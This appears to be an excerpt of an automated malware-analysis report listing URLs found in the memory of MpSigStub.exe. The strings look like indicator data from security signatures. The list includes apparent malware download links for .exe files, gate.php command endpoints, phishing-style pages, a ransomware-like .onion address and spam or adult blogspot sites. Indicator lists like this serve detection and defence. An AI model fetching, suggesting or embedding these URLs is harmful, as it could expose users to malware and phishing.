Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://appswonder.info
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://appustories.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://apupdates-westeurope.cloudapp.net/Update/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://apy4.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://araazman.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://arab-garden.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://aradiklarinburada.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://archiv.kl.com.ua/mssc.exe
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://arianarosefull.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://arifkacip.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://arizonaic.com
Source: MpSigStub.exe, 00000023.00000003.18315624417.0000015B1B02C000.00000004.00000001.sdmp String found in binary or memory: http://arpp0934.iespana.es
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://arthisoft.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://articlunik.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://artishollywoodbikini.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://asedownloadgate.com/safe_download/582369/AdsShow.exeg
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://asiafoodlog.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://asianhotxxx.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://asilsizhaber.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://aspeja.org/question/
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://aspx.qqus.net/wanmei/login.asp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://aspx.vod38.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://asuguglejancok.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://athasoftonlinestore.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://attcarsint.cf/better/)
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://attechnolegal.com/wp-content/themes/attlc/img/404.htm
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://auglaizeseniorservices.com/lombrdia/lomardia.php
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://australia-505.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://autism-doctor.com.ua/openbizz.html)
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://auto-klad.ru/
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://auto.ie.searchforge.com/
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://auto.ie.searchforge.com/g
Source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp String found in binary or memory: http://auto.livesearchpro.com/response
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://auto.search.
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://autonamlong.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://autothich.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: http://avcute.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://averyfunnypage.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://avisocliente31.altervista.org/hotmail-atualizacao32
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://avnisevinc.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://avnpage.info/final3.php
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://avnpage.info/video/prenium.xpi
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://avnpage.info/watch/prenium.crx
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://avocat360.fr/7-past-due-invoices/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://ayanojou.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://azalea26.orange.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://azalea26.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://b.reich.io/
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://b.wehelptoyou.com
Source: MpSigStub.exe, 00000023.00000003.18283887577.0000015B1A84E000.00000004.00000001.sdmp String found in binary or memory: http://ba3a.biz
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: http://babelfish.altavista.com/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://babukq4e2p4wu4iq.onion
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://bachduongshops.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://bahaiat.net/vm/dropbox/)
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://bai2.tlbxsj.com/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://baidu.wxbjy.info
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://balaiomaranhao.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://balochirap.com/wp-content/pdf/payment_advice_pdf.php?email=
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://banatara.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://banatte.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://bangash-free-soft.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://bani-pe-net-cum-sa-faci-bani.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18349680416.0000015B08178000.00000004.00000001.sdmp String found in binary or memory: http://bannercpm.com/bc
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://bar-refaeli-online.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://barrefaeli-hot.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://batrasiaku.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://batysnewskz.kz/ups.com
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://bbc.lumpens.org/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://bbfitblogger.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://bbtbfr.pw/GetHPHost
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://bbtbfr.pw/ads/gad1.js
Source: MpSigStub.exe, 00000023.00000003.18282239876.0000015B1C55A000.00000004.00000001.sdmp String found in binary or memory: http://bcoolapp.com
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://bdsmforyoungs.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://beautybrief.com/c/gate.php
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://beef.smmovefilehost.com/pc/page/set_reg.php?afc=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://bellasimpson.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://berita-mediasemasa.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://berita-tanahmelayu.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://berkah2013.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://beruijindegunhadesun.com/ktmcheck.exe
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://best-search.us
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://best4hack.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://bestbsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://bestbsd.info/cd/cd.php?id=%s&ver=ig1http://rezultsd.info/cd/cd.php?id=%s&ver=ig1http://carren
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://bestbsd.info/cd/cd.php?id=ERROR&ver=ig1
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://bestnyaduit.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://bestofthebesttatoo.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://bestoneoffour.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://bestsoll.com/forum/go.php?sid=2
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://besttechforum.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp String found in binary or memory: http://besttoolbars.net/af_analytics
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://bestwebtips.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://beutiful-girl-fuck-moviepp.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://bfb3c.21a8b.j4fbs.k876c575n.v48796e.f5.nbdc.y7.v2da8e4kt.drovemeetings.in/
Source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp String found in binary or memory: http://bgtc.pctonics.com
Source: MpSigStub.exe, 00000023.00000003.18334799670.0000015B1A704000.00000004.00000001.sdmp String found in binary or memory: http://bhngvfcdswqwertyuiopasdfghjkllkjhgfdsapo.ydns.eu/srvhost.doc
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://biancavoguel.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://bibliaamada.org/counter.php
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://big-boobs-nude.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://bigboobsp.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://bigdeal777.com/gate.php?f=
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://bikerboyz11.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://bilakubercakap.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://bilincaltitelkincd.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://bilincaltitemizligi.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: http://billpay-center.com/post/506pblpks.exe
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: http://binnenspegel.fryslan.intern/ofdielingen/iv/ict/projecten/docbaseq32014/documenten/forms/templ
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://binni-ks.com/modules/dashgoals/binni.htm)
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: http://bintai.com.sg.oliverboeckel.com/zgf2ev9zdwlaymludgfplmnvbs5zzw==
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://binyousafindustries.com/fonts/jo/mops.exe
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://bis.180solutions.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://bisersables.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2er
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2fy
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2h9
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2pe
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq2tt
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fq3ed
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqksy
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fql9f
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqlxg
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqm5f
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqmag
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqmin
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqnfa
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqnzq
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqrh4
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqv6g
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqv8b
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqwam
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqwdq
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqxt8
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqxx3
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqxx8
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyco
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqycs
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyh6
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyha
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyhe
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqyhk
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzi9
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzim
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzmn
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzmv
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzr4
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqzt3
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://bit.do/fqztv
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly
Source: MpSigStub.exe, 00000023.00000003.18307074601.0000015B1AA4C000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/28jsjnq)
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/29vi7ez)
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/2bl50do
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/2cobwhj)
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/2cokxeu)
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/2cqkvnc)
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/2df4jbx)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/2h3fi0m)
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/2hload25ydu19
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/2jg4gfn)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/2kud4md)
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/2p8qtra)
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://bit.ly/2q93tca)
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://bitcoincoin.xyz/payment/xls.exe
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://bitmessage.org/
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://bittupadam.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://bjphplegal.org/wp-admin/script/)/s/uri
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://bl103w.blu103.mail.live.com/mail/InboxLight.aspx?n=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://black43.ars.0manko.jp/set_inf.php?id=movies.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://blackhole.ddnsgeek.com:8088
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://blackl1vesmatter.org/gate
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://blackl1vesmatter.org/success
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://blackterias.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://blank-record.com/cgi-bin/search?id=
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://blattodea.ru/acd53ad2/although/clamp/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://blessedindia.org/9ifuurhgwq
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://blockchain.info/address/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://blog-ilmu10.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://blog-misteri.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://blog-rye.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://blog.eduadda.in/wp-content/themes/twentythirteen/get.php?id=
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: http://blog.x-row.net/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://blogcliphai.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://bloggersiput.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://bloggiaitribg.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://bloghumortododiablog.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://blogketoanthue.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://bloglistcorner.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://blogluyoruz.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://blogphimhay41.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://blogsemasacaparnab.blogspot.com/
